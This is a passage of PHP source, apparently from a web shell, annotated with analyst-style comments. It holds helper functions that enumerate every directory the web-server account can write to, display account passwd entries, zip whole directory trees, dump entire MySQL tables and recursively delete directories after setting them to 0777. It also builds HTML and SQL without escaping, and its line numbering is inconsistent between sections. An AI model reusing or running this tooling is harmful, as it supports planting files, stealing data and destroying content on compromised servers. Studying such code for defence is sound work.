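        case 0xC000:
            $type = 's';
            break;
        case 0xA000:
            $type = 'l';
            break;
        case 0x8000:
            $type = '-';
            break;
        case 0x6000:
            $type = 'b';
            break;
        case 0x4000:
            $type = 'd';
            break;
        case 0x2000:
            $type = 'c';
            break;
        case 0x1000:
            $type = 'p';
            break;
        default:
            $type = '?';
    }
    // One row per class: read, write, execute masks, then the special bit that
    // overlays the execute position and its set/unset-execute letters.
    $classes = array(
        array(0400, 0200, 0100, 0x800, 's', 'S'),
        array(0040, 0020, 0010, 0x400, 's', 'S'),
        array(0004, 0002, 0001, 0x200, 't', 'T'),
    );
    $perms = $type;
    foreach ($classes as $class) {
        list($read, $write, $exec, $special, $withExec, $withoutExec) = $class;
        $execChar = ($mode & $exec) ? 'x' : '-';
        if ($mode & $special) {
            $execChar = ($execChar == 'x') ? $withExec : $withoutExec;
        }
        $perms .= (($mode & $read) ? 'r' : '-') . (($mode & $write) ? 'w' : '-') . $execChar;
    }
    return $perms;
}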
/**
 * Return an HTML link showing the owner of a file, with the owner's passwd
 * entry in the link's title tooltip.
 *
 * Only produces output when the POSIX extension is available; otherwise, or
 * when the lookup fails, an empty string is returned.
 *
 * Every passwd field (name, passwd, uid, gid, gecos, dir, shell) is
 * concatenated into the title attribute without HTML escaping.
 *
 * @param string $filepath Path whose owner is looked up.
 * @return string HTML fragment starting with " / ", or ''.
 */
function getUser($filepath) {
    if (function_exists('posix_getpwuid')) {
        // fileowner() gives the numeric uid; posix_getpwuid() maps it to the account record.
        $array = @posix_getpwuid(@fileowner($filepath));
        if ($array && is_array($array)) {
            // &#13&#10 is a CR/LF pair used to break lines inside the tooltip.
            return ' / <a href="#" title="User: ' . $array['name'] . '&#13&#10Passwd: ' . $array['passwd'] . '&#13&#10Uid: ' . $array['uid'] . '&#13&#10gid: ' . $array['gid'] . '&#13&#10Gecos: ' . $array['gecos'] . '&#13&#10Dir: ' . $array['dir'] . '&#13&#10Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
        }
    }
    return '';
}
1762 // Delete dir
/**
 * Recursively delete a directory and everything beneath it.
 *
 * Each entry is chmod-ed to 0777 before removal so that read-only items do
 * not block the delete. Errors from chmod/unlink/rmdir are silenced.
 *
 * Caveats visible in the code:
 *  - the result of @dir() is not checked, so an unreadable or missing
 *    directory leads to a method call on false;
 *  - the loop condition treats the entry name as a boolean, so an entry
 *    literally named "0" ends the scan early;
 *  - is_dir() is used without a symlink check, so a link to a directory is
 *    descended into like a real one.
 *
 * @param string $deldir Directory to remove.
 * @return int 1 when the final rmdir() succeeded, 0 otherwise.
 */
function deltree($deldir) {
    $mydir = @dir($deldir);
    while ($file = $mydir->read()) {
        if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
            @chmod($deldir . '/' . $file, 0777);
            deltree($deldir . '/' . $file);
        }
        if (is_file($deldir . '/' . $file)) {
            @chmod($deldir . '/' . $file, 0777);
            @unlink($deldir . '/' . $file);
        }
    }
    $mydir->close();
    @chmod($deldir, 0777);
    return @rmdir($deldir) ? 1 : 0;
}
1779 // Background
/**
 * Return alternating CSS class names for zebra-striped table rows.
 *
 * Uses and increments the global counter $bgc on every call.
 *
 * @return string 'alt1' on even counter values, 'alt2' on odd ones.
 */
function bg() {
    global $bgc;
    $current = $bgc++;
    if ($current % 2 == 0) {
        return 'alt1';
    }
    return 'alt2';
}
1784 // Get path
/**
 * Normalise a directory path to forward slashes with a trailing slash.
 *
 * @param string $scriptpath Directory of the running script, used when $nowpath is '.'.
 * @param string $nowpath    Requested directory.
 * @return string Path using '/' separators, with one pass of '//' collapsing,
 *                always ending in '/'.
 */
function getPath($scriptpath, $nowpath) {
    $base = ($nowpath == '.') ? $scriptpath : $nowpath;
    // Backslashes first, then a single pass that collapses doubled slashes.
    $normalised = str_replace(array('\\', '//'), array('/', '/'), $base);
    return (substr($normalised, -1) != '/') ? $normalised . '/' : $normalised;
}
1796 // Get up path
/**
 * Return the parent directory of a slash-terminated path.
 *
 * @param string $nowpath Directory path ending in '/'.
 * @return string Parent directory, also ending in '/'.
 */
function getUpPath($nowpath) {
    $segments = explode('/', $nowpath);
    $total = count($segments);
    if ($total > 2) {
        // Drop the empty piece after the trailing slash and the last directory name.
        $segments = array_slice($segments, 0, $total - 2);
    }
    return str_replace('//', '/', implode('/', $segments) . '/');
}
1807 // Config
/**
 * Read a php.ini setting and present on/off values as 'Yes' / 'No'.
 *
 * The comparisons are loose (==). A missing setting (false) and "0" map to
 * 'No' and "1" maps to 'Yes'; on PHP versions before 8 a non-numeric string
 * also compares equal to 0 and is reported as 'No'.
 *
 * @param string $varname Name of the configuration directive.
 * @return mixed 'No', 'Yes', or the raw value from get_cfg_var().
 */
function getcfg($varname) {
    $value = get_cfg_var($varname);
    if ($value == 0) {
        return 'No';
    }
    return ($value == 1) ? 'Yes' : $value;
}
1818 // Function name
/**
 * Report whether a function is available in this interpreter.
 *
 * @param string $funName Function name to probe.
 * @return string 'Yes' when function_exists() is true, otherwise 'No'.
 */
function getfun($funName) {
    if (function_exists($funName)) {
        return 'Yes';
    }
    return 'No';
}
/**
 * Walk a directory tree and collect every sub-directory the PHP process can
 * write to.
 *
 * Results are accumulated in the global $dirdata array, indexed by the global
 * counter $j (started at 1). Each entry records the path relative to the
 * global $nowpath, the modification time, octal and symbolic permissions and
 * link values produced by ue() (defined outside this view).
 *
 * Defender note: the output is exactly the set of locations where the
 * web-server account could create or alter files, so directories that show up
 * here are the ones whose permissions deserve tightening.
 *
 * Caveats visible in the code: the loop treats the entry name as a boolean,
 * so an entry named "0" ends the scan of that directory early; the return
 * value of the recursive call is ignored because results travel through the
 * global.
 *
 * @param string $dir Directory to scan.
 * @return array|null The global $dirdata (null if nothing ever assigned it),
 *                    or an empty array when $dir cannot be opened.
 */
function GetList($dir) {
    global $dirdata, $j, $nowpath;
    !$j && $j = 1;
    if ($dh = opendir($dir)) {
        while ($file = readdir($dh)) {
            $f = str_replace('//', '/', $dir . '/' . $file);
            if ($file != '.' && $file != '..' && is_dir($f)) {
                if (is_writable($f)) {
                    $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
                    $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
                    $dirdata[$j]['dirchmod'] = getChmod($f);
                    $dirdata[$j]['dirperm'] = getPerms($f);
                    $dirdata[$j]['dirlink'] = ue($dir);
                    $dirdata[$j]['server_link'] = $f;
                    $dirdata[$j]['client_link'] = ue($f);
                    $j++;
                }
                // Descend whether or not this level was writable.
                GetList($f);
            }
        }
        closedir($dh);
        clearstatcache();
        return $dirdata;
    } else {
        return array();
    }
}
/**
 * Run a SQL statement on the current mysql_* connection and classify the outcome.
 *
 * @param string $sql Statement text, sent to the server as-is.
 * @return int 0 when the query failed, 1 when it produced a result resource
 *             (e.g. a SELECT), 2 when it succeeded without one.
 */
function qy($sql) {
    $result = @mysql_query($sql);
    if (!$result) {
        return 0;
    }
    return is_resource($result) ? 1 : 2;
}
/**
 * Run a SQL statement on the current mysql_* connection with warnings silenced.
 *
 * The statement text is passed through unchanged; there is no parameter
 * binding at this layer.
 *
 * @param string $sql Statement text.
 * @return resource|bool Whatever mysql_query() returns.
 */
function q($sql) {
    return @mysql_query($sql);
}
/**
 * Release the memory held by a mysql_* result set.
 *
 * @param resource $qy Result resource from a previous query.
 */
function fr($qy) {
    mysql_free_result($qy);
}
/**
 * Format a byte count as a short human-readable string.
 *
 * Values strictly above 1 GiB / 1 MiB / 1 KiB are divided by that unit and
 * rounded to two decimals; anything else is shown in bytes.
 *
 * @param int|float $size Size in bytes.
 * @return string e.g. "512 B", "1.5 K", "3 M", "2 G".
 */
function sizecount($size) {
    // Largest unit first so the first match wins.
    $units = array(' G' => 1073741824, ' M' => 1048576, ' K' => 1024);
    foreach ($units as $suffix => $divisor) {
        if ($size > $divisor) {
            return round($size / $divisor * 100) / 100 . $suffix;
        }
    }
    return $size . ' B';
}
1879 // Zip
1880 class PHPZip {
1881     var $out = '';
1882     function PHPZip($dir) {
1883         if (@function_exists('gzcompress')) {
1884             $curdir = getcwd();
1885             if (is_array($dir)) $filelist = $dir;
1886             else {
1887                 $filelist = $this->GetFileList($dir); //File list
1888                 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
1889             }
1890             if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
1891             else chdir($curdir);
1892             if (count($filelist) > 0) {
1893                 foreach ($filelist as $filename) {
1894                     if (is_file($filename)) {
1895                         $fd = fopen($filename, 'r');
1896                         $content = @fread($fd, filesize($filename));
1897                         fclose($fd);
1898                         if (is_array($dir)) $filename = basename($filename);
1899                         $this->addFile($content, $filename);
1900                     }
1901                 }
1902                 $this->out = $this->file();
1903                 chdir($curdir);
1904             }
1905             return 1;
1906         } else return 0;
1907     }
1908     // Show file list
1909     function GetFileList($dir) {
1910         static $a;
1911         if (is_dir($dir)) {
1912             if ($dh = opendir($dir)) {
1913                 while ($file = readdir($dh)) {
1914                     if ($file != '.' && $file != '..') {
1915                         $f = $dir . '/' . $file;
1916                         if (is_dir($f)) $this->GetFileList($f);
1917                         $a[] = $f;
1918                     }
1919                 }
1920                 closedir($dh);
1921             }
1922         }
1923         return $a;
1924     }
1925     var $datasec = array();
1926     var $ctrl_dir = array();
1927     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1928     var $old_offset = 0;
1929     function unix2DosTime($unixtime = 0) {
1930         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1931         if ($timearray['year'] < 1980) {
1932             $timearray['year'] = 1980;
1933             $timearray['mon'] = 1;
1934             $timearray['mday'] = 1;
1935             $timearray['hours'] = 0;
1936             $timearray['minutes'] = 0;
1937             $timearray['seconds'] = 0;
1938         } // end if
1939         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1940     }
1941     function addFile($data, $name, $time = 0) {
             // Appends one entry to the in-memory ZIP archive: a local file header plus
             // compressed data goes into $this->datasec, and the matching central
             // directory record goes into $this->ctrl_dir.
             //   $data - raw file contents
             //   $name - path stored in the archive (backslashes become forward slashes)
             //   $time - Unix timestamp for the entry; 0 means the current time
1942         $name = str_replace('\\', '/', $name);
1943         $dtime = dechex($this->unix2DosTime($time));
             // Reorders the hex digits into four "\xNN" escapes, least-significant byte first.
             // This relies on dechex() returning exactly 8 digits. A DOS time whose year is
             // below 1988 yields fewer, leaving $dtime[6]/$dtime[7] undefined and the
             // escape string malformed.
1944         $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
             // FLAG(review): eval() on a generated string. The evaluated text is built only
             // from dechex() output and literal "\x" prefixes, and is used purely to turn
             // the hex digits into raw bytes; pack('V', ...) is used for the same job below.
1945         eval('$hexdtime = "' . $hexdtime . '";');
1946         $fr = "\x50\x4b\x03\x04"; // local file header signature "PK\x03\x04"
1947         $fr.= "\x14\x00"; // version needed to extract
1948         $fr.= "\x00\x00"; // general purpose bit flags (none set)
1949         $fr.= "\x08\x00"; // compression method 8 = deflate
1950         $fr.= $hexdtime; // last-modified DOS time and date
1951         $unc_len = strlen($data);
1952         $crc = crc32($data);
1953         $zdata = gzcompress($data);
             // $c_len is measured before the zlib wrapper is stripped on the next line,
             // so the compressed size recorded in the headers is 6 bytes larger than
             // the deflate stream actually written.
1954         $c_len = strlen($zdata);
             // Drops the 2-byte zlib header and 4-byte trailing checksum, leaving raw deflate.
1955         $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1956         $fr.= pack('V', $crc);
1957         $fr.= pack('V', $c_len);
1958         $fr.= pack('V', $unc_len);
1959         $fr.= pack('v', strlen($name));
1960         $fr.= pack('v', 0); // extra field length
1961         $fr.= $name;
1962         $fr.= $zdata;
             // CRC and both sizes are written again after the data, in data-descriptor
             // layout, although the flags field above does not announce a descriptor.
1963         $fr.= pack('V', $crc);
1964         $fr.= pack('V', $c_len);
1965         $fr.= pack('V', $unc_len);
1966         $this->datasec[] = $fr;
             // Total bytes of all entries so far = offset of the next local header.
1967         $new_offset = strlen(implode('', $this->datasec));
1968         $cdrec = "\x50\x4b\x01\x02"; // central directory record signature "PK\x01\x02"
1969         $cdrec.= "\x00\x00"; // version made by
1970         $cdrec.= "\x14\x00"; // version needed to extract
1971         $cdrec.= "\x00\x00"; // general purpose bit flags
1972         $cdrec.= "\x08\x00"; // compression method 8 = deflate
1973         $cdrec.= $hexdtime;
1974         $cdrec.= pack('V', $crc);
1975         $cdrec.= pack('V', $c_len);
1976         $cdrec.= pack('V', $unc_len);
1977         $cdrec.= pack('v', strlen($name));
1978         $cdrec.= pack('v', 0); // extra field length
1979         $cdrec.= pack('v', 0); // file comment length
1980         $cdrec.= pack('v', 0); // disk number start
1981         $cdrec.= pack('v', 0); // internal file attributes
1982         $cdrec.= pack('V', 32); // external file attributes: 32 = DOS "archive" bit
1983         $cdrec.= pack('V', $this->old_offset); // offset of this entry's local header
1984         $this->old_offset = $new_offset;
1985         $cdrec.= $name;
1986         $this->ctrl_dir[] = $cdrec;
1987     }
1988     function file() {
             // Returns the complete archive as one binary string: all entries, then the
             // central directory, then the end-of-central-directory record.
1989         $data = implode('', $this->datasec);
1990         $ctrldir = implode('', $this->ctrl_dir);
             // The trailer holds the entry count (written twice: this disk / total), the
             // central directory size, its offset (the length of the entry data) and a
             // zero-length archive comment.
1991         return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1992     }
1993 }
1994 // Dump mysql
1995 function sqldumptable($table, $fp = 0) {
         // Writes a SQL dump of one table: a DROP/CREATE TABLE statement rebuilt from
         // SHOW FIELDS and SHOW KEYS, then one INSERT per row of SELECT *.
         // Output is fwrite()n to $fp when $fp is truthy, otherwise echoed into the response.
         // q() and fr() are defined elsewhere in the file; presumably they run a query
         // and free a result set - not visible here.
         // $table is interpolated into every statement without quoting or validation.
         // Depends on the legacy mysql_* extension (removed in PHP 7) and on each()
         // (removed in PHP 8).
         // Analyst note: the table is read with an unbounded SELECT *, so expect a
         // full-table read followed by a large response body or a file write.
1996     $tabledump = "DROP TABLE IF EXISTS $table;\n";
1997     $tabledump.= "CREATE TABLE $table (\n";
1998     $firstfield = 1;
1999     $fields = q("SHOW FIELDS FROM $table");
2000     while ($field = mysql_fetch_array($fields)) {
2001         if (!$firstfield) {
2002             $tabledump.= ",\n";
2003         } else {
2004             $firstfield = 0;
2005         }
2006         $tabledump.= "   $field[Field] $field[Type]";
             // empty() also rejects '0' and '', so such column defaults are left out of the dump.
2007         if (!empty($field["Default"])) {
2008             $tabledump.= " DEFAULT '$field[Default]'";
2009         }
2010         if ($field['Null'] != "YES") {
2011             $tabledump.= " NOT NULL";
2012         }
2013         if ($field['Extra'] != "") {
2014             $tabledump.= " $field[Extra]";
2015         }
2016     }
2017     fr($fields);
         // Group key columns by key name. Non-primary unique keys get a "UNIQUE|" tag.
         // $index is never initialised before its first use here.
2018     $keys = q("SHOW KEYS FROM $table");
2019     while ($key = mysql_fetch_array($keys)) {
2020         $kname = $key['Key_name'];
2021         if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2022             $kname = "UNIQUE|$kname";
2023         }
2024         if (!is_array($index[$kname])) {
2025             $index[$kname] = array();
2026         }
2027         $index[$kname][] = $key['Column_name'];
2028     }
2029     fr($keys);
         // The @ hides the warning each() raises when the table had no keys at all.
2030     while (list($kname, $columns) = @each($index)) {
2031         $tabledump.= ",\n";
             // Legacy implode() argument order (array first, separator second).
2032         $colnames = implode($columns, ",");
2033         if ($kname == "PRIMARY") {
2034             $tabledump.= "   PRIMARY KEY ($colnames)";
2035         } else {
                 // The "UNIQUE|" tag is stripped again and the key is written as a plain
                 // KEY, so uniqueness is not reproduced in the dump.
2036             if (substr($kname, 0, 6) == "UNIQUE") {
2037                 $kname = substr($kname, 7);
2038             }
2039             $tabledump.= "   KEY $kname ($colnames)";
2040         }
2041     }
2042     $tabledump.= "\n);\n\n";
2043     if ($fp) {
2044         fwrite($fp, $tabledump);
2045     } else {
2046         echo $tabledump;
2047     }
         // Row data: every column of every row, emitted one INSERT at a time.
2048     $rows = q("SELECT * FROM $table");
2049     $numfields = mysql_num_fields($rows);
2050     while ($row = mysql_fetch_array($rows)) {
2051         $tabledump = "INSERT INTO $table VALUES(";
2052         $fieldcounter = - 1;
2053         $firstfield = 1;
2054         while (++$fieldcounter < $numfields) {
2055             if (!$firstfield) {
2056                 $tabledump.= ", ";
2057             } else {
2058                 $firstfield = 0;
2059             }
                 // SQL NULL is written unquoted; everything else is quoted as a string.
2060             if (!isset($row[$fieldcounter])) {
2061                 $tabledump.= "NULL";
2062             } else {
2063                 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2064             }
2065         }
2066         $tabledump.= ");\n";
2067         if ($fp) {
2068             fwrite($fp, $tabledump);
2069         } else {
2070             echo $tabledump;
2071         }
2072     }
2073     fr($rows);
2074     if ($fp) {
2075         fwrite($fp, "\n");
2076     } else {
2077         echo "\n";
2078     }
2079 }
2080 function ue($str) {
         // Shorthand for urlencode().
2081     return urlencode($str);
2082 }
2083 function p($str) {
         // Echoes $str followed by a newline. No escaping is applied, so callers
         // pass finished markup.
2084     echo $str . "\n";
2085 }
2086 function tbhead() {
         // Opens the full-width layout table; tbfoot() emits the closing tag.
2087     p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2088 }
2089 function tbfoot() {
         // Closes the table opened by tbhead().
2090     p('</table>');
2091 }
2092 function makehide($name, $value = '') {
         // Emits a hidden <input> whose id and name are both $name.
         // $name and $value are interpolated into the attributes without HTML escaping.
2093     p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2094 }
2095 function makeinput($arg = array()) {
         // Emits an <input> element described by $arg. Keys read: size, extra, type,
         // title, class, name, value, newline.
         // Defaults: size 100, type "text", class "input". With a truthy 'newline' the
         // element is wrapped in <p>...</p>.
         // No value is HTML-escaped before being placed in the markup.
2096     $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2097     $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2098     !$arg['type'] && $arg['type'] = 'text';
2099     $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2100     $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2101     if ($arg['newline']) {
2102         p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2103     } else {
2104         p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2105     }
2106 }
2107 function makeselect($arg = array()) {
         // Emits a <select> element described by $arg. Keys read: onchange, title,
         // newline, name, option (value => label array), selected.
         // $onchange is assigned only when $arg['onchange'] is truthy; otherwise the
         // interpolation below reads an undefined variable.
2108     if ($arg['onchange']) {
2109         $onchange = 'onchange="' . $arg['onchange'] . '"';
2110     }
2111     $arg['title'] = $arg['title'] ? $arg['title'] : '';
2112     if ($arg['newline']) p('<p>');
2113     p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2114     if (is_array($arg['option'])) {
2115         foreach ($arg['option'] as $key => $value) {
                 // Loose comparison: the selected value is matched with ==, not ===.
2116             if ($arg['selected'] == $key) {
2117                 p("<option value=\"$key\" selected>$value</option>");
2118             } else {
2119                 p("<option value=\"$key\">$value</option>");
2120             }
2121         }
2122     }
2123     p("</select>");
2124     if ($arg['newline']) p('</p>');
2125 }
2126 function formhead($arg = array()) {
         // Opens a <form>. Keys read: method, action, target, name, title.
         // Defaults: method "post", name "form1". A truthy 'title' adds an <h2> heading.
2127     !$arg['method'] && $arg['method'] = 'post';
         // $self is neither a parameter nor declared global in this function, so it is
         // undefined here and the default action ends up as an empty string.
2128     !$arg['action'] && $arg['action'] = $self;
2129     $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2130     !$arg['name'] && $arg['name'] = 'form1';
2131     p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2132     if ($arg['title']) {
2133         p('<h2>' . $arg['title'] . ' &raquo;</h2>');
2134     }
2135 }
2136 function maketext($arg = array()) {
         // Emits a <textarea> wrapped in <p>. Keys read: cols, rows, title, name, extra, value.
         // Defaults: 100 columns, 25 rows. $arg['value'] is placed between the tags
         // without HTML escaping.
2137     !$arg['cols'] && $arg['cols'] = 100;
2138     !$arg['rows'] && $arg['rows'] = 25;
2139     $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2140     p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2141 }
2142 function formfooter($name = '') {
         // Emits a submit button named $name (default "submit") and closes the form.
2143     !$name && $name = 'submit';
         // The string is single-quoted, so \" stays as a literal backslash plus quote:
         // the emitted id attribute contains the backslashes.
2144     p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2145     p('</form>');
2146 }
2147 function formfoot() {
         // Closes a form without adding a submit button (compare formfooter()).
2148     p('</form>');
2149 }
2150 // Exit
2151 function pr($a) {
         // Debug helper: prints $a with print_r() inside <pre> tags. The output is
         // not HTML-escaped.
2152     echo '<pre>';
2153     print_r($a);
2154     echo '</pre>';
2155 }
2156 ?>